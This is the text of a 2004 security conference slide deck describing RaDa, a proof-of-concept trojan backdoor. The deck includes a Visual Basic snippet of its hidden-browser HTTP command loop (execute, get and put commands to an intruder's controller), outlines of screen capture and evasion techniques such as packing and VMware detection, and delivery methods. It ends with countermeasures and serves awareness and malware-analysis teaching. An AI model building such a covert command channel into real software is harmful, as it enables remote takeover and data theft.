malware rada

RaDa: a “new” trojan backdoor 1

RaDa: a “new” trojan backdoor

Jorge Ortiz & Raúl Silesjorge.ortiz@hp.com raul.siles@hp.com

FIST Conference Octubre/Madrid 2004

RaDa: a “new” trojan backdoor 2

Agenda

• Introduction• Healthy Environment• Remote Control (RaDa Demo)• One step beyond• Getting it in• Countermeasures

RaDa: a “new” trojan backdoor 3

Intro

• Awareness on trojans for remote control & protection measures.

• Most concepts are based in Setiri(R.Temmingh & H.Meer. BH 2002)

• Implemented by Raul Siles, David Perez & Jorge Ortiz

• Honeynet Project SOTM in September (Thanks Lance and Ed!)

RaDa: a “new” trojan backdoor 4

A healthy environment

• You have done a pretty good job:– Policy & procedures– Firewall (ingress and egress filters)– IDS– Secure configurations– AV and Personal Firewalls

• But problems appear…

RaDa: a “new” trojan backdoor 5

A healthy environment

Internet

Router

FirewallProxy

IDS

Secure system

RaDa: a “new” trojan backdoor 6

Remote Control

• Let’s think for a minute that the intruder has been able to install a program.

• We shall cover this later.

RaDa: a “new” trojan backdoor 7

Remote Control: implementation

• RaDa:– Very easy to do– A lot of Cut&Paste code (Google

knows how to do it!)– Visual Basic, Perl…– Using the IE of the system– HTTP communications

RaDa: a “new” trojan backdoor 8

RaDa: implementation

Sub RaDa_Run()' Load commands fileSet oExplorer = CreateObject("InternetExplorer.Application")

oExplorer.Visible = 0sCommandsURL = sServerURL & "/" & sCommandsFile

oExplorer.NavigatesCommandsURL

' Close Internet Explorer and release the object variable"oExplorer"

oExplorer.application.QuitSet oExplorer = Nothing

End Sub

' Loop through the commands ' (Input fields in the first Form)For Each Element In

oExplorer.Document.Forms(0).Elements

Select Case Element.NameCase "exe"

vRetValue = CommandExe(Element.Value)Case "get“

vRetValue = CommandGet(Element.Value)Case "put“

vRetValue = CommandPut(Element.Value)Case Else

'Ignore unknown commandEnd Select

Next Element

RaDa: a “new” trojan backdoor 9

RaDa: How It Works

1. Intruder publishes order2. RaDa opens invisible IE3. IE sends GET to Ctrler4. Ctrler sends command

back to RaDa5. RaDa execs command &

sends response withPOST

6. Intruder retrieves resultsfrom Ctrler

ControllerIntruder

HTTP/HTTPS

RaDa: a “new” trojan backdoor 10

DemoRaDa: Command Exec

1. RaDa/IE retrievescommand fromCtrler with GET

2. Parse page <inputtype=“text”name=“exe”value=“…”>

3. Exec commandwith Cmd.exe

ControllerIntruder

RaDa: a “new” trojan backdoor 11

DemoRaDa: File Download

1. RaDa/IE retrievescommand fromCtrler with GET

2. Parse page <inputtype=“text”name=“get”value=“…”>

3. Download file fromCtrler with POST.

4. UUdecode andsave it

ControllerIntruder

RaDa: a “new” trojan backdoor 12

DemoRaDa: Screen Capture

1. RaDa/IE retrievescommand fromCtrler with GET

2. Parse page <inputtype=“text”name=“screenshot”value=“…”>

3. Capture screen withselected name

ControllerIntruder

RaDa: a “new” trojan backdoor 13

DemoRaDa: File Upload

1. RaDa/IE retrievescommand fromCtrler with GET

2. Parse page <inputtype=“text”name=“put”value=“…”>

3. Send back contents withPOST

ControllerIntruder

RaDa: a “new” trojan backdoor 14

DemoRaDa: hiding techniques

• No application in Task Manager• Process name• Packed• HTTP through IE using HTML• Misleading info• VMWare detection

RaDa: a “new” trojan backdoor 15

One Step Beyond

• Strong authentication of commands (GPG)

• Blog/Wiki• Multiagent management Console• Other channels (mail, dns, ping,

ftp)

RaDa: a “new” trojan backdoor 16

Getting it in

• Zero day exploit• Ask for help:

– Mail attachment– Download– Social engineering

• Insider

RaDa: a “new” trojan backdoor 17

Countermeasures

• User awareness• Baselines (processes, memory…)• Restrict web access• Update AV signatures frequently.• Signed Executables• Behavioral vs. Signature analysis

RaDa: a “new” trojan backdoor 18

Scan of the Month

• Goal:– Improve the Windows reverse

engineering malware state of the art

• Honeynet Project:– http://www.honeynet.org/scans/

RaDa: a “new” trojan backdoor 19

That’s all folks

• Thank you!• Any questions?

FIST Conference Octubre/Madrid 2004

RaDa: a “new” trojan backdoor 20

Attribution-NonCommercial-NoDerivs 2.0

You are free:to copy, distribute, display, and perform the work Under the following conditions:

Attribution. You must give the original author credit.

Noncommercial. You may not use this work for commercial purposes.

No Derivative Works. You may not alter, transform, or build upon this work.

For any reuse or distribution, you must make clear to others the license terms of this work. Any of these conditions can be waived if you get permission from the author. Your fair use and other rights are in no way affected by the above.This is a human-readable summary of the http://creativecommons.org/licenses/by-nc-nd/2.0/.